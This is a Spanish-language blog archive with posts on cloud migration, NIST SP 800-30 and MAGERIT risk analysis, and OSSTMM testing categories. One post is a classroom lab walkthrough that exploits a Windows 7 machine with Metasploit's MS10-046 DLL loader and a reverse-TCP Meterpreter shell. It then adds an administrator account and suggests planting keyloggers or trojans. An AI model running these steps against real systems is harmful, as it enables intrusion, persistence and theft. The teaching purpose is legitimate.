viernes, 4 de diciembre de 2015

Las Ventajas y Desventajas de Migrar a Cloud


Cada día escuchamos más a nuestros "asesores tecnológicos" (empresas de servicios) que nos hablan de sus data centers y de las grandes ventajas de migrar a la nube, pero todo es tan positivo? de verdad es tan simple?, Bueno quiero comentarles desde mi punto de vista profesional los errores más comunes que me ha tocado vivir como ingeniero a cargo de un par de este tipo de proyectos, no es una gran guía ni tampoco pienso abarcar todo, sino simplemente escribir de forma clara y básica lo que a veces para las direcciones de las empresas resulta ser un poco enredado.



1.- Debemos preguntarnos el Cloud es apropiado para mi compaña?

Sabemos que empresas con datos sensibles y en su mayor caso de carácter confidencial difícilmente querría mover sus datos o aplicaciones a la nube de un tercero porque se pierde el control de la seguridad de la información y no solo es tipo de empresas sino que muchas otras por diversas razones no moverían su data a la nube, por ende la primera realidad es "La migración a la nube no es adecuada para todos" , aunque no podemos dejar de pensar y evaluar que la nube goza inicialmente de las siguientes 3 características :


  • Escalable 
  • Confiable 
  • De Alta Disponibilidad 

Estos 3 factores  son impulsadores para tomar una decisión, pero esta decisión debe ser imparcial y hay que evaluar unas cuantas otras características.

2.- Evaluemos algunos beneficios

Como en todo proyecto hay muchos beneficios que podrían tomar la ventaja de decidir que este puede ser el gran proyecto del área de TI. ¿Cuales?


A) Beneficios Asociados al costo y continuidad del negocio
  • Demanda de tráfico de recursos que hacen insostenible seguir adquiriendo equipamiento para satisfacer la demanda (storages, enlaces más rápidos, MPLS mas rápida, mejores switch, conexión de 10 GB o 40 GB, fibra, obras civiles, contratistas y todo lo que conlleva mejorar de manera Stand Alone los servicios de una empresa). 
  • Reducir Costos Operativos, quizás tiene Help Desk de 3 turnos y ya quisiera dejar el turno de noche o pagar a los especialistas por turnos los feriados o fines de semana, mayor infraestructura requiere especialistas más capacitados y crecer e infraestructura a la larga obligara a crecer en personal TI. 
  • Su compañía se está expandiendo y una infraestructura multí región o país requiere de grandes conocimientos y personal más experimentado, además de elevados costos (para quienes hemos trabajado con sucursales en otros países sabemos que no es lo mismo trabajar un proyecto con un mexicano que hacerlo con un argentino, son idiosincrasias distintas y requiere a jefes de proyecto muy capacitados para que todo funcione como se debe y en un corto tiempo). 
  • El recurso byte es su talón de alquiles, me refiero a no ser capaz de satisfacer todas las demandadas de almacenamiento. 
  • Generar desarrollos y teletrabajo centralizado, mejor dicho, hablar de desarrollo distribuido. 
  • Para muchas empresas su Disaster Recovery Plan significa replicar y quizás tener algún enlace de respaldo, pero sabemos que eso no es tan realista y si bien ayudará a la continuidad del negocio no se acerca a las bondades de un Cloud Disaster Recovery que sería más fácil de implementar. 
  • Delegar la administración de su infraestructura, pero no todo ya que es un error delegar toda la administración de su infraestructura (Solo actividades simples y que le quitan tiempo a su personal backup, Wsus, algunas replicaciones, etc)

B) Desventajas

Como en todo proyecto no puede ignorar que las desventajas también son u ámbito importante a evaluar:
  • Sus aplicaciones son demasiado precisas a nivel transaccional y quizás la latencia podría jugar muy en contra en cuanto a las actualizaciones y a tener los clientes nada de contentos. 
  • Si su escenario al día de hoy funciona bien y está todo controlado seria mover el mar para hacer grandes olas al querer migrar. 
  • Tiene desarrollos propios que quizás serán imposibles de llevar a la nube (aunque le digan que si, usted confié en su experiencia y olfato) 
  • Pérdida del control de la plataforma e infraestructura, tiempos alargados de migración fuera de plazos previstos, marcha blanca muy lenta y con muchos reclamos de sus usuarios. 
  • No evaluar la mejor opción y quizás tener que solicitar un re-diseño sobra la migración. 
  • Migrar la infraestructura a otro Cloud por cambio de proveedor puede ser tráumante. 
  • Despedir a su personal calificado para reducir costos operaciones y luego darse cuenta que contratar nuevo personal será de costo más elevado.


Por supuesto cada quién al viajar tiene una experiencia distinta y quizás usted tenga otras ventajas o desventajas que yo no he considerado, pero solo medite que esto es la básico que debemos evaluar.

2.-Que migrar? Que tipo de Cloud debo elegir?

En otro artículo me quiero referir al Hybrid Cloud pero por ahora para no complicarnos les diré que solo tiene 3 opciones:

  1. IaaS  : Servicio de Infraestructura (AWS, Azure, Google Compute Engine).
  2. SaaS : Servicio de Software (Google Apps, Salesforce, Office 365, algún ERP, etc).
  3. PaaS : Servicio de Plataformas (AWS Elastic Beanstalk, Heroku, Google App Engine).

Y es acá donde radica la decisión mas importante que usted debe tomar.


Entonces que decidir?



Si solo necesito infraestructura, si solo es necesario migrar mis aplicaciones (desarrollo) a la nube y centralizar o si necesito el gran cambio y migrar todo dejando solo una pequeña parte funcionando físicamente en mi compañía.
En el siguiente articulo comentaré un poco sobre Cloud Pública, Privada, o Híbrida?


Saludos a todos.








sábado, 21 de noviembre de 2015

Hackear Windows 7 Pro con Kali Linux y Metasploit Framework

Amigos esta vez les quiero compartir una de las actividades practicas que he realizado con mis alumnos de Taller de Seguridad en Redes y se trata de como hackear un sistema operativo Windows 7 con Kali linux y metasploit en pocos pasos.

Utilizaremos la técnica de DLL Loader
Los requerimientos

  • Kali Lnux 2.x y Rubi instalado
  • PC con WIndows 7 Pro
  • Metasploit Framework



Esta guía aplica a sistemas operativos sin antivirus/Firewall y con control de cuentas de usuario disminuidas o desactivadas

¿Qué es MetaSploit?

En pocas palabras Metasploit  Project es un proyecto de seguridad informática que proporciona información acerca de las vulnerabilidades de seguridad y ayuda en las pruebas de penetración y desarrollo de firmas de IDS.


Preparándonos para el ataque, en mi caso utilizaré 2 máquinas cargadas en virtualbox previamente el pc con windows tiene la IP 192.168.56.101 y el con Kali linux la IP 192.168.56.102



1.- Iniciamos las máquinas y debemos conocer obviamente cada una de las direcciones IP


2.- En Kali Linux ingresamos a una terminal para iniciar metasploit y ejecutamos las siguientes lineas, en nuestro caso utilizaremos el exploit de meterpreter

root@kali:~# msfconsole 
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 
msf exploit(ms10_046_shortcut_icon_dllloader) >


msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(ms10_046_shortcut_icon_dllloader) > show options 

Ahora Aparecerán las opciones para configurar el servidor



3.- Asignaremos la IP del PC con Kali linux al SRVHOSTy LHOST

msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.56.102
SRVHOST => 192.168.56.102
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.56.102
LHOST => 192.168.56.102

4.- Iniciamos el exploit

msf exploit(ms10_046_shortcut_icon_dllloader) > exploit 
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.102:4444 
[*] Send vulnerable clients to \\192.168.56.102\TXSWXRTH\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*] Using URL: http://192.168.56.102:80/
[*] Server started.
msf exploit(ms10_046_shortcut_icon_dllloader) >

Si nos fijamos hay una linea que dice "Using URL: http://192.168.56.102:80/" que es la que debemos utilizar en windows 7 desde el navegador



5- Una vez que accedamos a la dirección se nos abrirá una ventana preguntando si permitimos la conexión, damos clic en permitir.


Por su parte en la consola de metasploit comienza a emitir los logs del ataque

6.- al permitr se ejecutará el "dllloader" por lo que basta hacer un clic sobre el acceso directo

7.- En los log de  msfconsole veremos que se habilita la sesión 1 y para ello hacemos un enter para despejar los logs y escribimos

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i
Active sessions
===============
  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  GeekLinux-PC\GeekLinux @ GeekLinux-PC  192.168.56.102:4444 -> 192.168.56.101:49276 (192.168.56.101)

8.- Nos dice que esta la sesión 1 establecida por lo que el comando para seleccionar la sesión es similar al anterior solo que agregamos el número de la sesión al final.

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1

9.- Aparecerá la consola de Meterpreter

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >


Existe mucha documentación acerca de los comandos de meterpreter, acá podríamos inyectar un trayano o un keylogger, crear o copiar archivos, agregar usuarios, etc.


Ejemplo de captura de pantalla del PC atacado

meterpreter > screenshot


En la carpeta Root nos aparece la captura de pantalla


Ejemplo acceder a cmd.exe remotamente

meterpreter > execute -f cmd.exe -i –H
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Windows\system32>

Ejemplo agregar un usuario

C:\Windows\system32> net user GeekLinux 123456 /add

Hemos creado a un usuario llamado GeekLinux y su clave de acceso es 123456

Ejemplo Agregar al usuario al grupo administradores

C:\Windows\system32> net localgroup Administradores GeekLinux /add



Existe una infinidad de cosas que hacer, por supuesto crear un usuario evidenciaría mucho que el equipo ha sido hackeado pero complementar con otros ataques de metasploit como inyectar un troyano o algún keylogger seria mejor, o simplemente realizar copias de los archivos que desea, etc.

Esta guía esta realizada solo con fines académicos, para utilizarla no olviden hacer referencia a mi blog, Saludos



domingo, 4 de octubre de 2015

Metodología NIST SP 800-30 Para Análisis de Riesgo Informático

El análisis de riesgos informáticos es un proceso que comprende la identificación de activos informáticos, sus vulnerabilidades y amenazas a los que se encuentran expuestos así como su probabilidad de ocurrencia y el impacto de las mismas, a fin de determinar los controles adecuados para aceptar, disminuir, transferir o evitar la ocurrencia del riesgo.

Teniendo en cuenta que la explotación de un riesgo causaría daños o pérdidas financieras o administrativas a una empresa u organización, se tiene la necesidad de poder estimar la magnitud del impacto del riesgo a que se encuentra expuesta mediante la aplicación de controles. Dichos controles, para que sean efectivos, deben ser implementados en conjunto formando una arquitectura de seguridad con la finalidad de preservar las propiedades de confidencialidad, integridad y disponibilidad de los recursos objetos de riesgo.

NIST SP 800-30

Esta serie incluye una  metodología para el análisis  y gestión de riesgos de seguridad de la información,  alineada y complementaria  con el resto de documentos  de la serie.

9 pasos básicos para el análisis de riesgo

  • Caracterización del sistema. 
  • Identificación de amenazas. 
  • Identificación de vulnerabilidades. 
  • Control de análisis. 
  • Determinación del riesgo. 
  • Análisis de impacto. 
  • Determinación del riesgo. 
  • Recomendaciones de control. 
  • Resultado de la implementación o documentación


sábado, 3 de octubre de 2015

Metodología MAGERIT Para Análisis de Riesgo Informático

El análisis de riesgos informáticos es un proceso que comprende la identificación de activos informáticos, sus vulnerabilidades y amenazas a los que se encuentran expuestos así como su probabilidad de ocurrencia y el impacto de las mismas, a fin de determinar los controles adecuados para aceptar, disminuir, transferir o evitar la ocurrencia del riesgo.

Teniendo en cuenta que la explotación de un riesgo causaría daños o pérdidas financieras o administrativas a una empresa u organización, se tiene la necesidad de poder estimar la magnitud del impacto del riesgo a que se encuentra expuesta mediante la aplicación de controles. Dichos controles, para que sean efectivos, deben ser implementados en conjunto formando una arquitectura de seguridad con la finalidad de preservar las propiedades de confidencialidad, integridad y disponibilidad de los recursos objetos de riesgo.


Metodología MAGERIT (Metodología de Análisis y Gestión de Riesgos de IT)

Es una metodología que se esfuerza por enfatizarse en dividir los activos de la organización en variados grupos, para identificar más riesgos y poder tomar contramedidas para  evitar así cualquier inconveniente.

Objetivos

Objetivos Directos
  • Concienciar a los responsables de los sistemas de información de la existencia  de riesgos y de la necesidad de atajarlos a tiempo. 
  • Ofrecer un método sistemático para analizar tales riesgos 
  • Ayudar a descubrir y planificar las medidas oportunas para mantener los riesgos bajo  control
Objetivos Indirectos
  • Preparar a la Organización  para procesos de evaluación, auditoria,  certificación o acreditación, según corresponda en cada  caso..

Sub Modelos

Sub Modelo De Elementos
  • Es este submodelo se clasifican 6 elementos básicos que son: activos, amenazas, vulnerabilidades, impacto, riesgo, salvaguarda.
Sub Modelo De Eventos
  • Aquí se clasifican los elementos anteriores en tres formas: dinámico  físico, dinámico organizativo y estático.
Sub Modelo De Procesos
  • Se definen en 4 etapas: análisis de riesgo, planificación, gestión de riesgo y selección de salvaguardas

Volúmenes

Volumen I - Método
  • Es el volumen principal en el que se explica detalladamente la  metodología.

Volumen II – Catalogo  de elementos

  • Complementa el volumen principal proporcionando diversos inventarios de utilidad en la aplicación de la metodología. 
Volumen III – Guía de  técnicas
  • Complementa el volumen principal proporcionando una introducción de algunas de técnicas a utilizar en las  distintas fases del análisis de riesgos. 

Tecnicas

  • Análisis mediante tablas  
  • Análisis algorítmico 
  • Árboles de ataque 
  • Técnicas generales o  
  • Análisis coste-beneficio  
  • Diagramas de flujo de datos (DFD) 
  • Diagramas de procesos 
  • Técnicas gráficas 
  • Planificación de proyectos 
  • Sesiones de trabajo: entrevistas, reuniones y
  • presentaciones
  • Valoración Delphi

Seguridad de la Información y Seguridad Informática



Es común hablar de seguridad informática y de seguridad de la información como si fueran la misma cosa y, a primera vista, pareciera ser, sobre todo si se tiene en cuenta que en la actualidad, gracias al constante desarrollo tecnológico, se tiende a digitalizar todo tipo de información y manejarla a través de un sistema informático. Sin embargo, aunque tengan la necesidad de trabajar en armonía, cada uno de estos aspectos tiene objetivos y actividades diferentes.

Por seguridad informática

Se entiende al conjunto de políticas, reglas, estándares, métodos y protocolos que se utilizan para la protección de la infraestructura de computadoras y toda la información contenida o administrada por ella. Esta información debe ser protegida de la posible destrucción, modificación, difusión o utilización indebida. No sólo se debe prestar atención a los ataques intencionales, sino también a posibles fallas de software o hardware que atenten contra la seguridad.




Por seguridad de la información 

Se refiere a todas aquellas medidas que procuren resguardar la información ante cualquier irregularidad. La principal diferencia entre seguridad informática y seguridad de la información es que la primera se encarga de la seguridad en un medio informático y la segunda se interesa en la información en general (figura), pudiendo ésta estar almacenada tanto en un medio informático como en cualquier otro. Por ejemplo, un manual de procedimientos escrito en papel, el conocimiento que poseen las personas, escrituras en pizarras y papeles que se descartan, son fuentes importantes de información.

Fuente; Gastón Alejandro Toth (Tesis)



miércoles, 30 de septiembre de 2015

Categorizaciones OSSTMM (Pentesting)



OSSTMM plantea categorizaciones estándar, que permiten identificar claramente el alcance de cada una de las actividades, evitando inconvenientes en tal sentido:

  1. Búsqueda de Vulnerabilidades: Orientado principalmente a realizar comprobaciones automáticas de un sistema o sistemas dentro de una red.
  2. Escaneo de la Seguridad: Orientado a las búsquedas principales de vulnerabilidades en el sistema que incluyen verificaciones manuales de falsos positivos, identificación de los puntos débiles en el sistemas y análisis individualizado.
  3. Test de Intrusión: Se plantean test de pruebas que se centran en romper la seguridad de un sistema determinado.
  4. Evaluación de Riesgo: se refiere a los análisis de seguridad a través de entrevistas e investigación de nivel medio que incluye la justificación negocios, las justificaciones legales y las justificaciones específicas de la industria.
  5. Auditoria de Seguridad: Se refiere a la continua inspección que sufre el sistema por parte de los administradores que controlan que se cumplan las políticas de seguridad definidas.
  6. Hacking Ético: Orientado a tratar de obtener, a partir de los test de intrusión, objetivos complejos dentro de la red de sistemas.

Etapas Que Comprende El OSSTMM


El Manual de la Metodología Abierta de Comprobación de la Seguridad (OSSTMM, Open Source Security Testing Methodology Manual) es uno de los estándares profesionales más completos y comúnmente utilizados en Auditorías de Seguridad para revisar la Seguridad de los Sistemas desde Internet. Incluye un marco de trabajo que describe las fases que habría que realizar para la ejecución de la auditoría. Se ha logrado gracias a un consenso entre más de 150 expertos internacionales sobre el tema, que colaboran entre sí mediante Internet. Se encuentra en constante evolución y actualmente se compone de las siguientes fases:


Sección A -Seguridad de la Información

  • Revisión de la Inteligencia Competitiva
  • Revision de Privacidad
  • Recolección de Documentos

Sección B – Seguridad de los Procesos

  • Testeo de Solicitud
  • Testeo de Sugerencia Dirigida
  • Testeo de las Personas Confiables

Sección C – Seguridad en las tecnologías de Internet

  • Logística y Controles
  • Exploración de Red
  • Identificación de los Servicios del Sistema
  • Búsqueda de Información Competitiva
  • Revisión de Privacidad
  • Obtención de Documentos
  • Búsqueda y Verificación de Vulnerabilidades
  • Testeo de Aplicaciones de Internet
  • Enrutamiento
  • Testeo de Sistemas Confiados
  • Testeo de Control de Acceso
  • Testeo de Sistema de Detección de Intrusos
  • Testeo de Medidas de Contingencia
  • Descifrado de Contraseñas
  • Testeo de Denegación de Servicios
  • Evaluación de Políticas de Seguridad

Sección D – Seguridad en las Comunicaciones

  • Testeo de PBX
  • Testeo del Correo de Voz
  • Revisión del FAX
  • Testeo del Modem

Sección E – Seguridad Inalámbrica

  • Verificación de Radiación Electromagnética (EMR)
  • Verificación de Redes Inalámbricas [802.11]
  • Verificación de Redes Bluetooth
  • Verificación de Dispositivos de Entrada Inalámbricos
  • Verificación de Dispositivos de Mano Inalámbricos
  • Verificación de Comunicaciones sin Cable
  • Verificación de Dispositivos de Vigilancia Inalámbricos
  • Verificación de Dispositivos de Transacción Inalámbricos
  • Verficación de RFID
  • Verificación de Sistemas Infrarrojos
  • Revisión de Privacidad

Sección F – Seguridad Física

  • Revisión de Perímetro
  • Revisión de monitoreo
  • Evaluación de Controles de Acceso
  • Revisión de Respuesta de Alarmas
  • Revisión de Ubicación
  • Revisión de Entorno